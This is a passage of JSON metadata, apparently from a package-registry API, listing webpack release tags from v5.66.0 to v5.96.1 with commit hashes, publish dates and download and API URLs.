ll,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","